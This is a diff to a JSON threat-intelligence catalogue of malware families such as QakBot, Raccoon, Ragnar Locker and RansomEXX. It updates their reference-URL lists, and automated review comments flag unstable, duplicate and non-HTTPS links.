- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
- "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
- "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
- "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
- "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/",
- "https://hatching.io/blog/reversing-qakbot",
- "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
- "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html",
- "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
- "https://www.youtube.com/watch?v=iB1psRMtlqg",
- "https://blog.quosec.net/posts/grap_qakbot_strings/",
- "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
 "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://twitter.com/TheDFIRReport/status/1361331598344478727",
- "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
- "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "http://contagiodump.blogspot.com/2010/11/template.html",
- "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/",
- "https://www.group-ib.com/blog/prolock_evolution",
+ "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
+ "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/",
+ "https://twitter.com/ChouchWard/status/1405168040254316547",
+ "https://securelist.com/qakbot-technical-analysis/103931/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://twitter.com/_alex_il_/status/1384094623270727685",
+ "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/",
+ "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html",
+ "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view",
+ "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf",
+ "https://isc.sans.edu/diary/rss/26862",
+ "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html",
+ "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf",
+ "http://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://blog.quosec.net/posts/grap_qakbot_strings/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
 "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/",
+ "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot",
+ "https://www.intrinsec.com/egregor-prolock/",
+ "https://hatching.io/blog/reversing-qakbot",
+ "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques",
+ "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/",
+ "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs",
+ "https://malwareandstuff.com/upnp-messing-up-security-since-years/",
+ "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html",
+ "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7",
+ "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/",
+ "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/",
+ "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/",
+ "http://contagiodump.blogspot.com/2010/11/template.html",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html",
 "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks",
- "https://isc.sans.edu/diary/rss/26862"
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
+ "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
+ "https://blog.quosec.net/posts/grap_qakbot_navigation/",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf",
+ "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.secureworks.com/research/threat-profiles/gold-lagoon",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://twitter.com/elisalem9/status/1381859965875462144",
+ "https://www.group-ib.com/blog/egregor",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
+ "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/",
+ "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/",
+ "https://www.youtube.com/watch?v=iB1psRMtlqg",
+ "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
+ "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/",
+ "https://twitter.com/TheDFIRReport/status/1361331598344478727",
+ "https://www.um.edu.mt/library/oar/handle/123456789/76802",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/",
+ "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html",
+ "https://www.group-ib.com/blog/prolock_evolution"
 ],
 "synonyms": [
 "Pinkslipbot",
@@ -25323,9 +28896,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
 "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign",
 "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques",
 "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/",
+ "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign",
 "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga",
 "https://twitter.com/malwrhunterteam/status/789153556255342596",
 "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf",
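Review bot: Two QakBot refs on the new side are file-sharing links whose content the owner can replace or revoke without trace — the added `"https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view"` and the re-added `"https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89"` — so a later reader cannot confirm what was cited; pair each with a `web.archive.org` snapshot or the publisher's landing page. The Raccoon hunk below re-adds a `webcache.googleusercontent.com/search?q=cache:…` URL, which is a transient search-engine cache copy with the same weakness. The QakBot entry itself begins and ends outside this hunk, so its `description` and `synonyms` could not be checked against the new refs.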
@@ -25335,6 +28912,7 @@
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
 "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
 "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf",
+ "https://blog.minerva-labs.com/trapping-quasar-rat",
 "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848",
 "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
 "https://blog.malwarelab.pl/posts/venom/",
@@ -25345,11 +28923,14 @@
 "https://blog.reversinglabs.com/blog/rats-in-the-library",
 "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
 "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
 "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
 "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
 "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass",
 "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html",
 "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
 "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
 "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
@@ -25357,6 +28938,7 @@
 "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
 "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite",
 "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
 "https://www.antiy.cn/research/notice&report/research_report/20201228.html",
 "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments",
 "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
@@ -25402,19 +28984,28 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon",
- "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
 "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://www.youtube.com/watch?v=1dbepxN2YD8",
- "https://www.group-ib.com/blog/fakesecurity_raccoon",
 "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
 "https://www.youtube.com/watch?v=5KHZSmBeMps",
- "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
 "https://www.riskiq.com/blog/labs/magecart-medialand/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
- "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d",
+ "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html",
+ "https://www.group-ib.com/blog/fakesecurity_raccoon",
+ "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/",
+ "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/",
 "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf",
- "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf"
+ "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d",
+ "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://www.youtube.com/watch?v=1dbepxN2YD8",
+ "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf",
+ "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block",
+ "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/",
+ "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer"
 ],
 "synonyms": [
 "Mohazo",
@@ -25457,25 +29048,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", - "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/", + "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", + "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", + "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", + "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", + "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/", + "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", + 
"https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", - "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", - "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", - "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://securelist.com/targeted-ransomware-encrypting-data/99255/", - 
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information" + "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf" ], "synonyms": [], "type": [] @@ -25488,10 +29091,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", - "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/" + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", + "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/" ], "synonyms": [], "type": [] @@ -25504,6 +29109,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" ], "synonyms": [], 
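Review bot: The Ragnar Locker refs now contain near-duplicates: `https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1` and the same URL with a trailing slash, plus three URLs that appear to be one write-up (`http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html`, the `blog.reversing.xyz/reversing/...` copy and the `blog.reversing.xyz/docs/posts/...` copy). Consumers that match refs by exact string will count one source several times, so normalising to one canonical form per source, or deduplicating on trailing slash when lists are merged, is worth doing before this lands. Separately, `https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3` (also added to Ragnarok and RansomEXX) is an editable document rather than a publication; an archived snapshot or the report that cites it would be a more durable reference.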
@@ -25559,6 +29167,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
 "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html",
 "https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html",
 "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html",
@@ -25570,10 +29179,13 @@
 "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
 "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
 "https://research.checkpoint.com/ramnits-network-proxy-servers/",
+ "http://www.secureworks.com/research/threat-profiles/gold-fairfax",
 "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html",
 "https://www.youtube.com/watch?v=l6ZunH6YG0A",
 "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf"
+ "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail"
 ],
 "synonyms": [
 "Nimnul"
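Review bot: `http://www.secureworks.com/research/threat-profiles/gold-fairfax` is added over plain HTTP while the other secureworks refs in this file use `https://` (for example `https://www.secureworks.com/research/samsam-ransomware-campaigns` in the reGeorg entry); the gold-franklin ref in the RemCom hunk and gold-southfield in the REvil hunk have the same form. Enrichment tooling that fetches refs will go through a cleartext redirect first, and exact-match deduplication treats the http and https spellings as two sources, so `https://www.secureworks.com/research/threat-profiles/gold-fairfax` is the better form. The ResearchGate ref also carries a `?origin=publication_detail` query parameter that is tracking state rather than part of the document's identity and can be dropped.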
@@ -25648,22 +29260,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx", - "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4", "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3", "https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/", - "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/", 
"https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/", "https://github.com/Bleeping/Ransom.exx", - "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", - "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/" + "https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/", + "https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/", + "https://www.youtube.com/watch?v=qxPXxWMI2i4", + "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/", + "https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/", + "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout" ], "synonyms": [ "Defray777", @@ -25701,7 +29322,7 @@ "type": [] }, "uuid": "0e9c2936-7167-48fb-9dee-a83f83d8e41e", - "value": "Ransomware SNC" + "value": "SNC" }, { "description": "", 
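Review bot: After this hunk the RansomEXX refs list the same CrowdStrike post twice — the new bare `https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/` and the retained copy ending in `?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout`. The utm parameters are campaign tracking, not part of the resource, so the tracked variant should be removed (or `utm_*` keys stripped when refs are imported) so one source is not presented as two. Keeping both the live cisoclub.ru URL and its web.archive.org snapshot is reasonable, since those are distinct resources.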
@@ -25829,6 +29450,19 @@
 "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7",
 "value": "RawPOS"
 },
+ {
+ "description": "Razy is a malware family which uses a malicious browser extension in order to steal cryptocurrency.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.razy",
+ "https://securelist.com/razy-in-search-of-cryptocurrency/89485/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6293085e-55c7-4026-8c98-1fa489692d4e",
+ "value": "Razy"
+ },
 {
 "description": "A family identified by ESET Research in the InvisiMole campaign.",
 "meta": {
@@ -25951,6 +29585,19 @@
 "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88",
 "value": "RedAlpha"
 },
+ {
+ "description": "RedDelta variant of PlugX as used by Mustang Panda.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reddelta",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a28c43e7-f303-4adb-b5f7-c3c7f9821bcd",
+ "value": "RedDelta"
+ },
 {
 "description": "",
